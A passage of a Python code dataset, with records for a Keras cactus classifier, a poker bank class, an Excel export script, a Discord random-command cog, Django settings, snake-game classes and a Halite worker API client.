'subset' for define 'training' or 'validation'\ndatagen = ImageDataGenerator(rescale = 1./255)\n#datagen = ImageDataGenerator(rescale = 1./255, validation_split = 0.25)\nbatch_size = 150\n\n#create a dataframe using pandas and text files provided,\n#and create a meaningful dataframe with columns having file name\n#(only the file names, not the path) and other classes to be used by the model\n#Change only 1 column to string\ntrain['has_cactus'] = train['has_cactus'].astype(str)\n#split train and validate dataset\ntrain_generator = datagen.flow_from_dataframe(dataframe = train[:15001], directory = train_dir, x_col = 'id',\n y_col = 'has_cactus', class_mode ='binary', batch_size = batch_size, target_size = (150, 150))\n\nvalidation_generator=datagen.flow_from_dataframe(dataframe = train[15000:], directory = train_dir, x_col = 'id',\n y_col = 'has_cactus', class_mode = 'binary', batch_size = 50, target_size=(150, 150))\n#try validation split in ImageDataGenerator\n#test_validation_split = datagen.flow_from_dataframe(dataframe = train, directory = train_dir, x_col = 'id',\n #y_col = 'has_cactus', class_mode ='binary', batch_size = batch_size ,subset = 'validation', target_size = (150, 150))\n\n#Convolutions are defined on two key parameters\n #The size of patches that are extracted from input feature map..ie here 3x3\n #The number of filters computed from convolutions\n\n#Building our model\n#5 Conv2D + Maxpooling2D stages with relu activation function.\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32, (3,3), activation='relu', input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPool2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3),activation='relu',input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPool2D((2, 2)))\nmodel.add(Conv2D(128, (3, 3),activation='relu',input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPool2D((2, 2)))\nmodel.add(layers.Conv2D(128, (3, 3),activation='relu',input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPool2D((2, 2)))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\nmodel.summary()\n\n#Compiling our model\n #loss: we will set our loss as binary_crossentropy since we are attacking a binary classification problem\n #optimizer : optimizers shape and mold your model into its most accurate 
possible form by futzing with the weights.\n    #metrics : This is the evaluation criteria that we choose to evaluate our model\nmodel.compile(loss='binary_crossentropy',optimizer=optimizers.RMSprop(),metrics=['acc'])\n\n#Fitting our model\nepochs=10\nhistory=model.fit_generator(train_generator,steps_per_epoch=100,epochs=10,validation_data=validation_generator,validation_steps=50)\n\n#Evaluating our model\n\n#Improving our model using VGG16\nmodel_vg=VGG16(weights='imagenet',include_top=False)\nmodel_vg.summary()\n\n#Extracting features using VGG16\ndef extract_features(directory,samples,df):\n\n\n    features=np.zeros(shape=(samples,4,4,512))\n    labels=np.zeros(shape=(samples))\n    generator=datagen.flow_from_dataframe(dataframe=df,directory=directory,x_col='id',\n                                          y_col='has_cactus',class_mode='other',batch_size=batch_size,\n                                          target_size=(150,150))\n    i=0\n    for input_batch,label_batch in generator:\n        feature_batch=model_vg.predict(input_batch)\n        features[i*batch_size:(i+1)*batch_size]=feature_batch\n        labels[i*batch_size:(i+1)*batch_size]=label_batch\n        i+=1\n        if(i*batch_size>samples):\n            break\n    return(features,labels)\n\ntrain.has_cactus=train.has_cactus.astype(int)\nfeatures,labels=extract_features(train_dir,17500,train)\ntrain_features=features[:15001]\ntrain_labels=labels[:15001]\n\nvalidation_features=features[15000:]\nvalidation_labels=labels[15000:]\n\n#Reshaping our features to feed into our dense layers\n#df_test.has_cactus=df_test.has_cactus.astype(str)\ntest_features,test_labels=extract_features(test_dir,4000,df_test)\ntrain_features=train_features.reshape((15001,4*4*512))\nvalidation_features=validation_features.reshape((2500,4*4*512))\ntest_features=test_features.reshape((4000,4*4*512))\n\n#Define a densely connected network\nmodel=models.Sequential()\nmodel.add(layers.Dense(212,activation='relu',kernel_regularizer=regularizers.l1_l2(.001),input_dim=(4*4*512)))\nmodel.add(layers.Dropout(0.2))\nmodel.add(layers.Dense(1,activation='sigmoid'))\n\nmodel.compile(optimizer=optimizers.RMSprop(),loss='binary_crossentropy',metrics=['acc'])\nhistory=model.fit(train_features,train_labels,epochs=30,batch_size=15,validation_data=(validation_features,validation_labels))\n\n#making prediction (the sigmoid output is already a probability)\ny_pre=model.predict(test_features)\n\n#making submission\ndf=pd.DataFrame({'id':df_test['id'] })\ndf['has_cactus']=y_pre\ndf.to_csv(\"submission.csv\",index=False)\n","sub_path":"cactus.py","file_name":"cactus.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"411942873","text":"#!/usr/bin/env python\n\n\"\"\"\nCreated by Eric Warburg on 2010-08-29.\nCopyright (c) 2010. 
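# Note on the slicing in the cactus.py record above: train_features uses
# features[:15001] while validation_features uses features[15000:], so row
# 15000 appears in both sets (the same off-by-one is in the earlier DataFrame
# slices train[:15001] / train[15000:]). A non-overlapping split is a one-line
# change; a small numpy sketch of the intended pattern:

import numpy as np

features = np.arange(20).reshape(10, 2)  # stand-in for the extracted features
split = 7
train_features, validation_features = features[:split], features[split:]
# No sample can appear in both halves, and nothing is lost.
assert len(train_features) + len(validation_features) == len(features)
print(train_features.shape, validation_features.shape)  # (7, 2) (3, 2)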
All rights reserved.\n\"\"\"\n\n\nclass Bank(object):\n    def __init__(self, start=0):\n        self.balance = start\n    \n    def deposit(self, amount):\n        if amount >= 0:\n            self.balance += amount\n        else:\n            raise ValueError(\"Depositing a negative amount\")\n    \n    def bet(self, amount):\n        if amount >= 0 :\n            if (self.balance - amount) < 0:\n                old_balance = self.balance\n                self.balance = 0\n                return old_balance\n            else:\n                self.balance -= amount\n                return amount\n        else:\n            raise ValueError(\"Withdrawing a negative amount\")\n    \n    def restake(self, amount):\n        if amount >= 0:\n            self.balance = amount\n        else:\n            raise ValueError(\"Restaking with a negative amount\")","sub_path":"libpoker/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"554098188","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n[Function Description]\n------------------------------------------------------------------------------------------------------------------------\nCollect end-time and total-efficiency results for the clockwise and counter-clockwise experiment groups from the\nefficiency/time workbook and export them side by side as a single Excel table.\n------------------------------------------------------------------------------------------------------------------------\n\"\"\"\n\nimport time\nimport pandas as pd\n\n# Display all the columns of DataFrame\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n# Display all the columns of DataFrame within a single row\npd.set_option('display.width', None)\n\n\ndef factor_result(df_result, list_num):\n    \"\"\"Collect the end time, the total efficiency at factors 0.7-1.0 and the five section values\n    for each experiment number in list_num.\"\"\"\n    list_exp_num = list_num\n    list_end_time = []\n    list_eff_07 = []\n    list_eff_08 = []\n    list_eff_09 = []\n    list_eff_10 = []\n    list_section = []\n    for num in list_exp_num:\n        end_time = df_result.loc[num, 1.0]['end_time']\n        eff_07 = df_result.loc[num, 0.7]['eff_total']\n        eff_08 = df_result.loc[num, 0.8]['eff_total']\n        eff_09 = df_result.loc[num, 0.9]['eff_total']\n        eff_10 = df_result.loc[num, 1.0]['eff_total']\n        ser_section = df_result.loc[num, 1.0][['section1', 'section2', 'section3', 'section4', 'section5']]\n        list_end_time.append(end_time)\n        list_eff_07.append(eff_07)\n        list_eff_08.append(eff_08)\n        list_eff_09.append(eff_09)\n        list_eff_10.append(eff_10)\n        list_section.append(ser_section.values)\n    section_df = pd.DataFrame(list_section, columns=['section1', 'section2', 'section3', 'section4', 'section5'])\n    result_dict = {'exp_num': list_exp_num, 'end_time': list_end_time,\n                   'eff_0.7': list_eff_07, 'eff_0.8': list_eff_08, 'eff_0.9': list_eff_09, 'eff_1.0': list_eff_10}\n    result_df = pd.DataFrame(result_dict)\n\n    return result_df, section_df\n\n\nif __name__ == '__main__':\n\n    file_path = r'H:\VibrationTrace\Experiment_Efficiency_Time.xlsx'  # Local folder on this PC\n    df_data = pd.read_excel(file_path, skiprows=1, index_col=[0, 1])  # index_col builds the two-level (experiment, factor) MultiIndex while reading\n\n    exp_num_cw = [46, 54]  # Clockwise experiments\n    exp_num_acw = [82, 90]  # Counter-clockwise experiments\n    num_cw_list = list(range(exp_num_cw[0], exp_num_cw[1] + 1))\n    num_acw_list = list(range(exp_num_acw[0], exp_num_acw[1] + 1))\n    df_data_cw, df_sec_cw = factor_result(df_data, num_cw_list)\n    df_data_acw, df_sec_acw = factor_result(df_data, num_acw_list)\n    df_data_direction = pd.concat([df_data_cw, df_sec_cw, df_data_acw, df_sec_acw], axis=1)\n    print(df_data_direction)\n\n    # Save the DataFrame to the desktop as an Excel file\n    save_time = time.strftime('%y%m%d%H%M%S')  # Timestamp: yymmddHHMMSS\n    df_data_direction.to_excel(r'C:\Users\C\Desktop\Result_Factor%s.xlsx' % 
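# A behavior sketch for the Bank class above: bet() returns the amount actually
# staked, so betting more than the balance goes "all in", empties the balance
# and returns whatever was left. The trimmed copy below mirrors that logic so
# the sketch runs on its own (it is not the record's full class).

class Bank(object):
    def __init__(self, start=0):
        self.balance = start

    def bet(self, amount):
        if amount < 0:
            raise ValueError("Withdrawing a negative amount")
        staked = min(amount, self.balance)  # can never stake more than we hold
        self.balance -= staked
        return staked

b = Bank(start=50)
assert b.bet(30) == 30 and b.balance == 20
assert b.bet(100) == 20 and b.balance == 0  # all-in: only 20 was available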
save_time)\n","sub_path":"Vibrating_Screen/visualize/exp_excel_sigmaplot.py","file_name":"exp_excel_sigmaplot.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"447809676","text":"from decorators import help\nimport discord\nfrom discord.ext import commands\nfrom enums.help_categories import Category\nfrom functions import colours\nimport random\nimport requests\nimport json\n\n\nclass Random(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n # Don't allow any commands to work when locked\n def cog_check(self, ctx):\n return not self.client.locked\n\n # Creates an alias\n @commands.command(name=\"Choice\", aliases=[\"Choose\"], usage=\"[Argumenten]\")\n async def choose(self, ctx, *options):\n await self.choice(ctx, *options)\n\n @commands.command(name=\"Shuffle\", usage=\"[Argumenten]\")\n async def _shuffle(self, ctx, *options):\n await self.shuffle(ctx, *options)\n\n @commands.group(name=\"Random\", aliases=[\"R\", \"Rand\", \"RNG\"], case_insensitive=True, invoke_without_command=True)\n @help.Category(category=Category.Random, unpack=True)\n async def random(self, ctx):\n pass\n\n @random.command(name=\"Choice\", usage=\"[Argumenten]\")\n async def choice(self, ctx, *options):\n if not options or not options[0]:\n return await ctx.send(\"Geef een geldige reeks op.\")\n\n await ctx.send(random.choice(options))\n\n @random.command(name=\"Number\", aliases=[\"Int\"], usage=\"[Van]* [Tot]*\")\n async def number(self, ctx, to=100, start=1):\n # This allows number(to) to work, as well as number(start, to)\n if start > to:\n start, to = to, start\n\n await ctx.send(random.randint(start, to))\n\n @number.error\n async def on_number_error(self, ctx, error):\n if isinstance(error, discord.ext.commands.BadArgument):\n await ctx.send(\"Dit is geen geldig getal.\")\n else:\n raise error\n\n @random.command(name=\"Name\")\n async def name(self, ctx):\n try:\n name = requests.get(\"https://randomuser.me/api/\").json()\n except json.decoder.JSONDecodeError:\n await ctx.send(\"Er ging iets mis. Probeer het opnieuw.\")\n return\n\n name = name[\"results\"][0][\"name\"]\n await ctx.send(\"{} {} {}\".format(name[\"title\"], name[\"first\"], name[\"last\"]))\n\n @random.command(name=\"Identity\", aliases=[\"Id\"])\n async def identity(self, ctx):\n try:\n identity = requests.get(\"https://randomuser.me/api/\").json()\n except json.decoder.JSONDecodeError:\n return await ctx.send(\"Er ging iets mis. 
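# factor_result() in the record above relies on a two-level (experiment number,
# factor) index so that df.loc[num, factor] selects a single row. A minimal
# sketch of that MultiIndex lookup pattern on a toy frame (the values are
# made up for illustration):

import pandas as pd

idx = pd.MultiIndex.from_product([[46, 47], [0.7, 1.0]],
                                 names=['exp_num', 'factor'])
df = pd.DataFrame({'eff_total': [0.61, 0.74, 0.58, 0.71],
                   'end_time': [12.0, 15.5, 11.8, 14.9]}, index=idx)

row = df.loc[46, 1.0]               # one row: experiment 46 at factor 1.0
print(row['eff_total'])             # 0.74
print(df.loc[47, 0.7]['end_time'])  # 11.8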
Probeer het opnieuw.\")\n\n identity = identity[\"results\"][0]\n name = identity[\"name\"]\n name = \"{} {} {}\".format(name[\"title\"], name[\"first\"], name[\"last\"])\n\n gender = identity[\"gender\"]\n street = \"{} {}\".format(identity[\"location\"][\"street\"][\"number\"], identity[\"location\"][\"street\"][\"name\"])\n location = \"{}, {}, {}, {}\".format(street, identity[\"location\"][\"city\"],\n identity[\"location\"][\"state\"], identity[\"location\"][\"country\"])\n age = identity[\"dob\"][\"age\"]\n\n await ctx.send(\"{}\\n{}, {}\\n{}\".format(name, age, gender, location))\n\n @random.command(name=\"Shuffle\", aliases=[\"Order\"], usage=\"[Argumenten]\")\n async def shuffle(self, ctx, *args):\n if not args:\n return await ctx.send(\"Geef een geldige reeks op.\")\n\n args = list(args)\n\n random.shuffle(args)\n\n await ctx.send(\" - \".join(args))\n\n @random.command(name=\"Colour\", aliases=[\"Color\"])\n async def colour(self, ctx):\n r, g, b = colours.randomRGB()\n\n embed = discord.Embed(colour=discord.Colour.from_rgb(r, g, b))\n embed.set_author(name=\"Random Colour\")\n embed.add_field(name=\"RGB\", value=\"{}, {}, {}\".format(r, g, b), inline=False)\n embed.add_field(name=\"HEX\", value=colours.RGBToHEX(r, g, b), inline=False)\n embed.add_field(name=\"HSL\", value=\"{}°, {}%, {}%\".format(*colours.RGBToHSL(r, g, b)), inline=False)\n embed.add_field(name=\"HSV\", value=\"{}°, {}%, {}%\".format(*colours.RGBToHSV(r, g, b)), inline=False)\n await ctx.send(embed=embed)\n\n @random.command(name=\"Timestamp\", aliases=[\"Time\", \"Ts\"])\n async def timestamp(self, ctx):\n hour = str(random.randint(0, 23))\n hour = (\"0\" if len(hour) == 1 else \"\") + hour\n minutes = str(random.randint(0, 23))\n minutes = (\"0\" if len(minutes) == 1 else \"\") + minutes\n await ctx.send(\"{}:{}\".format(hour, minutes))\n\n @random.command(name=\"Fact\", aliases=[\"Knowledge\"])\n async def fact(self, ctx):\n randomFact = requests.get(\"https://uselessfacts.jsph.pl/random.json?language=en\").json()\n await ctx.send(randomFact[\"text\"])\n\n @commands.command(name=\"Yes/No\", aliases=[\"Yn\"])\n @help.Category(Category.Random)\n async def yesno(self, ctx):\n await ctx.send(random.choice([\"Ja.\", \"Nee.\"]))\n\n\ndef setup(client):\n client.add_cog(Random(client))\n","sub_path":"cogs/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"291393902","text":"# flake8: noqa\n\nfrom unipath import Path\n\nDEBUG = False\n\n# Absolute filesystem path to the project directory\nPROJECT_ROOT = Path(__file__).ancestor(4)\n\n# Absolute path to the Django subdirectory\nDJANGO_ROOT = PROJECT_ROOT.child('src')\n\n# Path to the directory where public files will be served\nPUBLIC_ROOT = PROJECT_ROOT.child('public')\n\nALLOWED_HOSTS = []\n\n\nDJANGO_APPS = [\n 'django.forms', # This is needed because of the custom form renderer\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.postgres',\n 'django.contrib.sites',\n 'django.contrib.flatpages',\n]\n\nTHIRD_PARTY_APPS = [\n 'compressor',\n 'rest_framework',\n 'django_xworkflows',\n]\n\nLOCAL_APPS = [\n 'core',\n 'accounts',\n 'home',\n 'geofr',\n 'backers',\n 'tags',\n 'aids',\n 'dataproviders',\n 'analytics',\n 'data',\n 'alerts',\n 'bookmarks',\n 'programs',\n 'categories',\n 'search',\n 'stats',\n 
'pages',\n 'minisites'\n]\n\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n]\n\nROOT_URLCONF = 'core.urls'\n\nWSGI_APPLICATION = 'core.wsgi.application'\n\n# Password validation\n# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators\n\nVALIDATORS_PATH = 'django.contrib.auth.password_validation'\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': VALIDATORS_PATH + '.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': VALIDATORS_PATH + '.MinimumLengthValidator',\n 'OPTIONS': {\n 'min_length': 9,\n }\n },\n {\n 'NAME': VALIDATORS_PATH + '.CommonPasswordValidator',\n },\n {\n 'NAME': VALIDATORS_PATH + '.NumericPasswordValidator',\n },\n]\nAUTH_USER_MODEL = 'accounts.User'\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.0/topics/i18n/\n\nLANGUAGE_CODE = 'fr'\n\nTIME_ZONE = 'Europe/Paris'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = [\n DJANGO_ROOT.child('static'),\n DJANGO_ROOT.child('node_modules'),\n]\n\nSTATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n]\n\nSTATIC_ROOT = PUBLIC_ROOT.child('static')\n\nMEDIA_URL = '/media/'\n\nMEDIA_ROOT = PUBLIC_ROOT.child('media')\n\nNODE_MODULES_PATH = DJANGO_ROOT.child('node_modules')\n\nSASS_PATH = 'make css'\n\nCOMPRESS_PRECOMPILERS = (\n ('text/x-scss', '{} include={} infile={{infile}} outfile={{outfile}}'.format(\n SASS_PATH, NODE_MODULES_PATH)),\n)\n\nLOCALE_PATHS = [\n DJANGO_ROOT.child('locales'),\n]\n\nFORM_RENDERER = 'django.forms.renderers.TemplatesSetting'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [DJANGO_ROOT.child('templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'debug': False,\n 'context_processors': [\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'core.context_processors.integration',\n 'core.context_processors.contact_data',\n 'core.context_processors.admin_stats',\n 'core.context_processors.contributor_stats',\n ],\n 'libraries': {\n 'form_utils': 'core.templatetags.form_utils',\n }\n },\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',\n 'PAGE_SIZE': 50,\n}\n\n\n# Define a custom logger that sends events to admin users\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse',\n }\n },\n 'handlers': {\n 'mail': {\n 'level': 'INFO',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler',\n }\n },\n 'loggers': {\n 'aidesterritoires': {\n 'handlers': ['mail'],\n 'level': 'INFO',\n }\n }\n}\n\nADMINS = [('Aides-territoires', 'nowhere@example.org')]\n\nMAILING_LIST_URL = None\n\nAPPROACHING_DEADLINE_DELTA = 30 # days\n\nUNVALIDATED_ALERTS_QUOTA = 10\nMAX_ALERTS_QUOTA = 
100\n\nANALYTICS_ENABLED = False\nANALYTICS_SITEID = 0\nHOTJAR_SITEID = 0\n\nCONTACT_EMAIL = 'nowhere@example.org'\nCONTACT_PHONE = '+33123456789'\nEMAIL_SUBJECT_PREFIX = '[Aides-Territoires] '\nDEFAULT_FROM_EMAIL = 'aides-territoires@beta.gouv.fr'\nSERVER_EMAIL = 'aides-territoires@beta.gouv.fr'\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nEMAIL_WHITELIST = []\n\nSITE_ID = 1\n\nLOGIN_URL = 'login'\nLOGOUT_REDIRECT_URL = 'home'\nLOGIN_REDIRECT_URL = 'profile'\n\nSEARCH_COOKIE_NAME = 'currentsearch'\n\nSIB_API_KEY = ''\nSIB_LIST_ID = ''\n","sub_path":"src/core/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589864179","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport enum\nimport collections\nimport random\nimport numpy as np\n\nclass CellType(enum.Enum):\n \"\"\"Defines all types of cells that can be found in the snake game.\n\n \"\"\"\n EMPTY = 0\n FRUIT = 1\n SNAKE_HEAD = 2\n SNAKE_BODY = 3\n WALL = 4\n\n\nclass Point(collections.namedtuple('PointTuple', ['x', 'y'])):\n \"\"\" Represents a 2D point with named axes (x, y).\n\n \"\"\"\n def __add__(self, other):\n \"\"\"Add two points coordinate-wise.\n\n \"\"\"\n return Point(self.x + other.x, self.y + other.y)\n\n def __sub__(self, other):\n \"\"\"Subtract two points coordinate-wise.\n\n \"\"\"\n return Point(self.x - other.x, self.y - other.y)\n\n\nclass Direction(enum.Enum):\n \"\"\"Defines all possible directions the snake can take, as well as the corresponding offsets.\n\n \"\"\"\n NORTH = Point(0, -1)\n EAST = Point(1, 0)\n SOUTH = Point(0, 1)\n WEST = Point(-1, 0)\n\n\nclass SnakeAction(enum.Enum):\n \"\"\"Defines all possible actions the agent can take in the environment.\n\n \"\"\"\n MAINTAIN_DIRECTION = 0\n TURN_LEFT = 1\n TURN_RIGHT = 2\n\n\nclass Snake(object):\n \"\"\"Represents the snake that has a position, can move, and change directions.\n\n \"\"\"\n def __init__(self, position, direction=Direction.NORTH, length=3):\n \"\"\"Create a new snake.\n\n Parameters\n ----------\n position: snake_entities.Point\n A point representing the initial position of the snake. \n\n direction: snake_entities.Direction\n Initial moving direction of the snake.\n\n length: integer\n An integer specifying the initial length of the snake.\n\n \"\"\"\n self._m_direction = direction\n self._m_all_directions = list(Direction)\n\n self._m_body = [position]\n for _ in range(length - 1):\n body_direction_idx = self._m_all_directions.index(direction) - 2\n cell = self._m_body[-1] + self._m_all_directions[body_direction_idx].value\n self._m_body.append(cell)\n self._m_body = collections.deque(self._m_body)\n\n @property\n def body(self):\n return self._m_body\n\n @property\n def head(self):\n return self._m_body[0]\n\n @property\n def tail(self):\n return self._m_body[-1]\n\n @property\n def length(self):\n return len(self._m_body)\n\n @property\n def direction(self):\n return self._m_direction\n\n def peek_next(self):\n \"\"\" Get the point the snake will move to at its next step. 
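# The module above is a base settings file (DEBUG = False, empty ALLOWED_HOSTS,
# console email backend). A typical companion would star-import it and override
# only what differs per environment. This is a configuration sketch of a
# hypothetical src/core/settings/local.py, not a module from the record, and it
# only runs inside that package:

from .base import *  # noqa: F401,F403  (inherit every base setting)

DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1']

# Point the ORM at the database described by the DB_* settings from base.py.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': DB_NAME,
        'USER': DB_USER,
        'PASSWORD': DB_PASS,
        'HOST': DB_HOST,
        'PORT': DB_PORT,
    }
}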
\"\"\"\n return self.head + self._m_direction.value\n\n def turn_left(self):\n direction_idx = self._m_all_directions.index(self._m_direction)\n self._m_direction = self._m_all_directions[direction_idx - 1]\n\n def turn_right(self):\n direction_idx = self._m_all_directions.index(self._m_direction)\n self._m_direction = self._m_all_directions[\n (direction_idx + 1) % len(self._m_all_directions)]\n\n def grow(self):\n \"\"\"Grow the snake by 1 block from the head. \"\"\"\n self._m_body.appendleft(self.peek_next())\n\n def move(self):\n \"\"\" Move the snake 1 step forward, taking the current direction into account.\"\"\"\n self._m_body.appendleft(self.peek_next())\n self._m_body.pop()\n\n\nclass Field(object):\n \"\"\"Represents the playing field for the Snake game.\n\n \"\"\"\n def __init__(self, field_map=None):\n \"\"\"Create a new Snake field.\n \n Parameters\n ----------\n field_map: list\n A list of strings representing the field objects (1 string per row).\n\n \"\"\"\n self._m_field_map_to_cell_type = {\n 'S': CellType.SNAKE_HEAD,\n 's': CellType.SNAKE_BODY,\n '#': CellType.WALL,\n 'O': CellType.FRUIT,\n '.': CellType.EMPTY,\n }\n\n self._m_cell_type_to_field_map = dict(\n (cell_type, symbol) for symbol, cell_type in self._m_field_map_to_cell_type.items()\n )\n\n self._m_field_map = field_map\n self._m_cells = None\n self._m_empty_cells = set()\n self.reset()\n\n def __getitem__(self, point):\n if not isinstance(point, Point) and not isinstance(point, tuple):\n raise TypeError(\"'point' is neither a Point instance or tuple instance\")\n x, y = point\n return self._m_cells[y, x]\n\n def __setitem__(self, point, cell_type):\n if not isinstance(point, Point) and not isinstance(point, tuple):\n raise TypeError(\"'point' is neither a Point instance or tuple instance\")\n\n x, y = point\n self._m_cells[y, x] = cell_type\n if cell_type == CellType.EMPTY:\n self._m_empty_cells.add(Point(x, y))\n else:\n if point in self._m_empty_cells:\n self._m_empty_cells.remove(Point(x, y))\n\n def reset(self):\n \"\"\"Create a new field based on the field map.\n\n \"\"\"\n try:\n self._m_cells = np.array([\n [self._m_field_map_to_cell_type[c] for c in row] for row in self._m_field_map\n ])\n\n self._m_empty_cells.clear()\n for y in range(self._m_cells.shape[0]):\n for x in range(self._m_cells.shape[1]):\n if self[(x, y)] == CellType.EMPTY:\n self._m_empty_cells.add(Point(x, y))\n\n except KeyError as err:\n raise ValueError(f'Unknown field map symbol: \"{err.args[0]}\"')\n\n def __str__(self):\n return '\\n'.join(\n ''.join(self._m_cell_type_to_field_map[cell] for cell in row) for row in self._m_cells\n )\n\n @property\n def cells(self):\n return self._m_cells\n\n @property\n def size(self):\n height, width = self._m_cells.shape\n return width, height\n\n def get_random_empty_cell(self):\n \"\"\"Choose an empty cell randomly.\"\"\"\n return random.choice(list(self._m_empty_cells))\n\n def find_snake_head(self):\n \"\"\"Find the snake's head on the field.\"\"\"\n width, height = self.size\n for x in range(width):\n for y in range(height):\n if self[(x, y)] == CellType.SNAKE_HEAD:\n return Point(x, y)\n raise ValueError('Initial snake position not specified on the field map')\n\n def place_snake(self, snake, clean=True):\n \"\"\"Put the snake on the field and fill the cells with its body.\n\n Parameters\n ----------\n snake: snake_entities.Snake\n The snake you want to place.\n\n clean: boolean\n Whether or not to clean the old Snake.\n\n \"\"\"\n if clean is True:\n width, height = self.size\n for x in 
range(width):\n for y in range(height):\n if self[(x, y)] == CellType.SNAKE_BODY or \\\n self[(x, y)] == CellType.SNAKE_HEAD:\n self[(x, y)] = CellType.EMPTY\n\n for snake_cell in snake.body:\n if self[snake_cell] == CellType.WALL:\n continue\n self[snake_cell] = CellType.SNAKE_BODY\n\n if self[snake.head] != CellType.WALL:\n self[snake.head] = CellType.SNAKE_HEAD\n\n","sub_path":"projects/games/code/snake/game/env/snake_entities.py","file_name":"snake_entities.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"613114339","text":"import urllib.request\nimport requests\nimport json\nfrom hashlib import md5\nimport configparser\nimport os\n\nconfig = configparser.ConfigParser()\nconfig.read(\"../halite.ini\")\nAPI_KEY = config.get(\"hce\", \"apiKey\")\nMANAGER_URL = config.get(\"hce\", \"managerURL\")\n\ndef getTask():\n\t\"\"\"Gets either a run or a compile task from the API\"\"\"\n\tcontent = requests.get(MANAGER_URL+\"task\", params={\"apiKey\": API_KEY}).text\n\tif content == \"null\":\n\t\treturn None\n\telse:\n\t\treturn json.loads(content)\n\ndef getBotHash(userID):\n\t\"\"\"Gets the checksum of a user's bot's zipped source code\"\"\"\n\tresult = requests.get(MANAGER_URL+\"botHash\", params={\"apiKey\": API_KEY, \"userID\": userID})\n\tprint(result.text)\n\treturn json.loads(result.text).get(\"hash\")\n\ndef storeBotLocally(userID, storageDir):\n\t\"\"\"Downloads and store's a bot's zip file locally\n\tChecks the file's checksum to make sure the file was downloaded properly\n\t\"\"\"\n\titerations = 0\n\twhile iterations < 100:\n\t\tremoteZip = urllib.request.urlopen(MANAGER_URL+\"botFile?apiKey=\"+str(API_KEY)+\"&userID=\"+str(userID))\n\t\tzipFilename = remoteZip.headers.get('Content-disposition').split(\"filename\")[1]\n\t\tzipPath = os.path.join(storageDir, zipFilename)\n\t\tif os.path.exists(zipPath):\n\t\t\tos.remove(zipPath)\n\n\t\tremoteZipContents = remoteZip.read()\n\t\tremoteZip.close()\n\n\t\tlocalZip = open(zipPath, \"wb\")\n\t\tlocalZip.write(remoteZipContents)\n\t\tlocalZip.close()\n\n\t\tif md5(remoteZipContents).hexdigest() != getBotHash(userID):\n\t\t\titerations += 1\n\t\t\tcontinue\n\n\t\treturn zipPath\n\n\traise ValueError\n\ndef storeBotRemotely(userID, zipFilePath):\n\t\"\"\"Posts a bot file to the manager\"\"\"\n\tzipContents = open(zipFilePath, \"rb\").read()\n\titerations = 0\n\n\twhile iterations < 100:\n\t\tr = requests.post(MANAGER_URL+\"botFile\", data={\"apiKey\": API_KEY, \"userID\": str(userID)}, files={\"bot.zip\": zipContents})\n\n\t\t# Try again if local and remote hashes differ\n\t\tif md5(zipContents).hexdigest() != getBotHash(userID):\n\t\t\tprint(\"Hashes do not match! 
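# A behavior sketch for the snake record above, assuming it is importable as
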